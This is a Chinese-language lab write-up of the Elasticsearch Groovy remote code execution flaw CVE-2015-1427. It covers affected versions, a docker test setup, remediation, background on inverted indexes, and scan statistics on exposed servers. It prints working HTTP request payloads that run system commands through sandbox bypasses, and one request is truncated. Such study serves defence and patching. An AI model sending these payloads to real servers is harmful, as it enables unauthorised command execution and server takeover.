ElasticSearch 命令执行漏洞
漏洞描述
1.漏洞编号:CVE-2015-1427
2.影响版本:
jre版本:openjdk:8-jre
elasticsearch版本:v1.4.2
v1.4: 1.4.2 , 1.4.1 , 1.4.0 , 1.4.0.Beta1
v1.3: 1.3.7 , 1.3.6 , 1.3.5 , 1.3.4 , 1.3.3 , 1.3.2 , 1.3.1 , 1.3.0.
3.漏洞产生原因:
参考文章:
- http://cb.drops.wiki/drops/papers-5107.html
- http://jordan-wright.com/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/
- https://github.com/XiphosResearch/exploits
- http://cb.drops.wiki/drops/papers-5142.html
CVE-2014-3120后,ElasticSearch默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。本漏洞:1.是一个沙盒绕过; 2.是一个Goovy代码执行漏洞。
## Groovy语言“沙盒”
ElasticSearch支持使用“在沙盒中的”Groovy语言作为动态脚本,但显然官方的工作并没有做好。lupin和tang3分别提出了两种执行命令的方法:
1. 既然对执行Java代码有沙盒,lupin的方法是想办法绕过沙盒,比如使用Java反射
2. Groovy原本也是一门语言,于是tang3另辟蹊径,使用Groovy语言支持的方法,来直接执行命令,无需使用Java语言
所以,根据这两种执行漏洞的思路,我们可以获得两个不同的POC。
Java沙盒绕过法:
java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("id").getText()
Goovy直接执行命令法:
def command='id';def res=command.execute().text;res
启动环境:docker-compose up -d
vulnIP:192.168.1.232
环境启动后,访问`http://your-ip:9200`即可看到ElasticSearch默认首页。
漏洞发现
关注ElasticSearch的版本
漏洞利用
由于查询时至少要求es中有一条数据,所以发送如下数据包,增加一个数据:
POST /website/blog/ HTTP/1.1 Host: your-ip:9200 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 25 { "name": "test" }
利用反射机制执行JAVA代码Payload:
POST /_search?pretty HTTP/1.1 Host: 192.168.1.232:9200 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/text Content-Length: 493 { "size":1, "script_fields": { "test#": { "script": "java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getInputStream())).readLines()", "lang": "groovy" } } }
执行结果:
利用Groovy语言执行命令:
Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 160 {"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}
问题汇总
修复方案
方法一:升级到官方最新版本
方法二:在 ElasticSearch 文件下 /config/elasticsearch.yml 中加入:script.groovy.sandbox.enabled: false
基础知识
1. 全文检索:扫描文章中的每一个词,给每一个词建立一个索引指明该词在文章中出现的位置和次数。当进行查询操作时直接根据索引进行查找。
2. 倒排索引:索引表中的每一项都包括一个属性值和具有该属性值的各记录的地址。由于不是由记录来确定属性值,而是由属性值来确定记录的位置,因而称为倒排索引(inverted index)。
举个栗子:文档A和C里面都有一个词B,我们查找B的时候,是先找到关键词B,再根据B存储的索引找到A和C;而不是先找到A,在A里面检索B,再找到C,在C里面检索B。
3. ElasticSearch:基于开源的全文检索引擎Lucene,是一个实时分布式搜索和分析引擎,支持全文检索,结构化检索(就是咱们平时用的sql语句的形式)和数据分析等。
4. ES的一些核心概念:
Index:索引,就是我们平时理解的数据库(database)
type:类型,就是表(table)
document:文档,es的最小数据单元。就是表中的一行数据(row)
field:字段,就是列(column)
mapping:映射,就是约束(schema)
MSF
应急
ElasticSearch Groovy 脚本远程代码执行是一个严重的漏洞,黑客可以直接控制存着这个漏洞的服务器.
来自知道创宇的 ZoomEye 团队(钟馗之眼网络空间探知系统)通过几种方式的组合检测,得到了些影响结论。
注意:以下这些影响都是可被直接远程攻击的,属于高危级别!
第一组数据 2015 / 03 / 04
我们基于 ZoomEye 库里的 53469 个 9200 端口 IP ,进行本次漏洞检测,受本次漏洞影响可被远程访问的主机数为 3852 个,其中中国大陆有 245 台外网可访问的 ElasticSearch 服务器受到影响.
第二组数据 2015 / 03 / 05
我们又对 2014 公布的 ElasticSearch 远程任意代码执行漏洞 ( CVE-2014-3120 ) 和这次爆出的漏洞 ( CVE-2015-1427 ) 漏洞都进行了检测。
受 CVE-2014-3120 影响的主机数为 583 个
受 CVE-2015-1427 影响的主机数为 3843 个
2021-02-12 14:09:07